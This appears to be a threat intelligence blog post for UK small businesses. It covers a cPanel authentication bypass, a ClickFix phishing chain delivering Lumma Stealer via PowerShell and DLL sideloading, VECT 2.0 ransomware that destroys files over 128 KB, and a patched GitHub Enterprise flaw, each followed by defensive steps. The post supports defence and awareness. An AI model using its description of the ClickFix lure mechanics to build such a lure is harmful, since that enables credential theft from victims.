Threat Analysis: cPanel Auth Bypass, ClickFix Phishing, and VECT Ransomware — What UK SMBs Need to Know

Threats & Attacks

Threat Analysis: cPanel Auth Bypass, ClickFix Phishing, and VECT Ransomware — What UK SMBs Need to Know

By Mauven MacLeod ·

Hello, Mauven here.

Three things in today’s threat intelligence deserve your attention if you run or advise a UK small business. None of them are hypothetical. All three are active as of 29 April 2026.

I will not cover everything in the feed. That is not the job. The job is to tell you which three things actually matter today and what they mean operationally.

1. cPanel Authentication Bypass — Emergency Patch, No Patch Means No Password Needed

cPanel has issued an emergency update to address a critical authentication bypass vulnerability affecting all versions of cPanel and WebHost Manager (WHM) prior to the latest release.

What the advisory says: update immediately.

What it does not say loudly enough: if your web hosting runs on cPanel or WHM — and a very large share of UK SMB shared and managed hosting does — and your hosting provider has not applied this patch, an attacker can access your hosting control panel without supplying any credentials. None. They do not need your password. They bypass the authentication mechanism entirely.

From a hosting control panel, an attacker can modify your website, redirect your domain, harvest contact form submissions, access email accounts, extract database credentials, and deploy malware to anyone visiting your site. This is not a privilege escalation issue. This is the keys to the front door.

Hosting providers are responsible for patching the underlying cPanel installation on shared hosting. You cannot apply this patch yourself. What you can do is ask — today, not next week — whether your provider has applied the emergency update. If they cannot tell you, that is your answer.

If you self-host on a VPS with your own cPanel installation, you are responsible. Log in to WHM, check your version, and run the update from the Update Preferences section.

What to do:

  • Contact your hosting provider and ask specifically whether the cPanel/WHM emergency patch released on 29 April 2026 has been applied to servers hosting your account.
  • If you manage your own cPanel/WHM installation, update immediately via the WHM Update Center.
  • Review your hosting control panel login logs for any anomalous access. If you do not know how to do this, ask your provider.

2. ClickFix Phishing — Lumma Stealer via PowerShell, No Attachment Required

ClickFix-style phishing campaigns are continuing to mature, and the variant currently in active distribution is deploying Lumma Stealer via a multi-stage chain that begins with social engineering and ends with credential theft from browsers, email clients, and cryptocurrency wallets.

The mechanics are worth understanding because they defeat the usual advice about “do not open attachments”.

The victim receives a message — this variant uses delivery-themed lures and fake verification pages — that instructs them to complete a CAPTCHA or verification step. The page presents a dialogue that asks the user to press Windows key + R, then paste a command into the Run box. The command is already in the clipboard, placed there by the page. The user follows the instructions. PowerShell executes. An obfuscated download fetches a malicious MSI installer from a remote server. The installer uses DLL sideloading — renaming legitimate binaries to execute malicious ones — to deploy HijackLoader, which in turn drops Lumma Stealer.

Lumma Stealer then harvests saved passwords from browsers, session tokens, two-factor authentication codes from authenticator apps, and cryptocurrency wallet files. It exfiltrates everything before the user has any indication something has gone wrong.

The reason this is particularly relevant to UK SMBs right now: Proofpoint has reported over a hundred tax-themed campaigns in 2026 with a notable increase in payloads delivered via remote monitoring and management tools and similar social engineering lures. ClickFix variants slot neatly into that pattern. If your staff are processing anything finance-related — payroll, VAT returns, supplier invoices — they are the target audience for these lures right now.

Proofpoint’s reporting also notes that DHL brand impersonation is active, with an eleven-step credential harvesting chain targeting consumer and business users through spoofed shipment notifications. If anyone in your business is expecting a delivery and clicks a notification email, they are a potential victim.

What the threat intelligence does not say clearly enough: your standard email filtering is increasingly insufficient against these campaigns because the initial email itself may contain no malicious link. The malicious action happens client-side, triggered by the user following on-screen instructions that appear entirely legitimate.

What to do:

  • Brief staff this week on the specific mechanic: if any webpage asks you to press Windows key + R and paste something, that is an attack. It does not matter how legitimate the page looks.
  • Restrict PowerShell execution via group policy or Windows Defender Application Control where staff do not have a legitimate need for it. In most small business environments, that is most staff.
  • Ensure browser credential saving is disabled in favour of a managed password manager. Lumma Stealer’s primary harvest is saved browser passwords.
  • Review whether any staff have received DHL-branded notification emails recently and have not flagged them.

3. VECT 2.0 Ransomware — A Wiper in Disguise

Check Point Research has published a detailed technical analysis of VECT 2.0 ransomware, which targets Windows, Linux, and ESXi platforms. The finding that matters operationally is this: VECT has a fundamental encryption implementation error that causes files larger than 128 KB to be permanently destroyed rather than encrypted.

The ransomware uses ChaCha20-IETF cipher but saves only one of the four nonces required to decrypt large files. Those files cannot be recovered. Not by you, not by the attackers, not by any recovery tool. They are gone.

This matters in a way that is not captured by standard ransomware threat assessments. When a ransomware operator tells you they can decrypt your files in exchange for payment, they are, in this case, wrong. The decryption key they hold is incomplete. VECT is functionally a wiper for anything above the 128 KB threshold — which includes most business documents, database files, virtual machine images, and backups stored on accessible drives.

The ransomware operates as a Ransomware-as-a-Service offering, meaning access is sold to affiliates who may not be aware of this flaw. Attribution is to a group called TeamPCP. The advisory notes multi-platform capability, including ESXi targeting — which is relevant for any business running virtualised servers.

This variant reinforces something that has been true for years but is worth repeating in this specific context: paying the ransom is not a recovery strategy. It was never a reliable strategy, and in the case of VECT it is definitively not one.

If you are hit by VECT, your recovery depends entirely on whether your backups are intact, offline, and have been tested. Not backed up to the same server. Not backed up to a network drive that is mapped at the time of infection. Offline. Tested.

What to do:

  • Verify your backup strategy today. Specifically: are your most recent backups stored offline or air-gapped from your live environment? When was the last time you tested a restore?
  • If you use ESXi or similar virtualisation, ensure your VM snapshots are not the only backup you have. VECT specifically targets ESXi platforms.
  • Ensure your incident response plan — even an informal one — includes the scenario where the ransom payment will not recover your data. The decision-making path should not begin with “shall we pay” when files may already be unrecoverable.

Brief Note: GitHub RCE — Relevant if Your Business Uses GitHub

GitHub patched CVE-2026-3854 in early March — a critical remote code execution flaw in GitHub Enterprise Server that could have allowed attackers to access millions of private repositories via a single command. The full analysis was published today by BleepingComputer.

This is already patched. If you use GitHub Enterprise Server on-premises, confirm you are on a patched version. If you use GitHub’s cloud service, GitHub handled it. The reason to note it here is that any business using GitHub for code, documentation, or internal tooling should audit who has access to private repositories and whether those repositories contain credentials, API keys, or configuration files that should not be there. Incidents like this are a prompt to tidy up, not just to patch.

Sources

SourceTitleURL
BleepingComputercPanel, WHM emergency update fixes critical auth bypass bughttps://www.bleepingcomputer.com/news/security/cpanel-whm-emergency-update-fixes-critical-auth-bypass-bug/
AlienVault OTXClickFix-style phishing: Lumma Stealer via PowerShell and HijackLoaderhttps://otx.alienvault.com
Check Point ResearchVECT: Ransomware by design, Wiper by accidenthttps://research.checkpoint.com/2026/vect-ransomware-by-design-wiper-by-accident/
ProofpointSecurity brief: tax scams aim to steal funds from taxpayershttps://www.proofpoint.com/us/blog/threat-insight/security-brief-tax-scams-aim-steal-funds-taxpayers
BleepingComputerGitHub fixes RCE flaw that gave access to millions of private reposhttps://www.bleepingcomputer.com/news/security/github-fixes-rce-flaw-that-gave-access-to-millions-of-private-repos/
Forcepoint X-LabsInside a Fake DHL Campaign Built to Steal Credentialshttps://www.forcepoint.com/blog/x-labs/fake-dhl-phishing-campaign-credential-theft

Filed under

  • smb-security
  • uk-business
  • credential-theft
  • ransomware-groups
  • social-engineering
  • vendor-risk
  • incident-response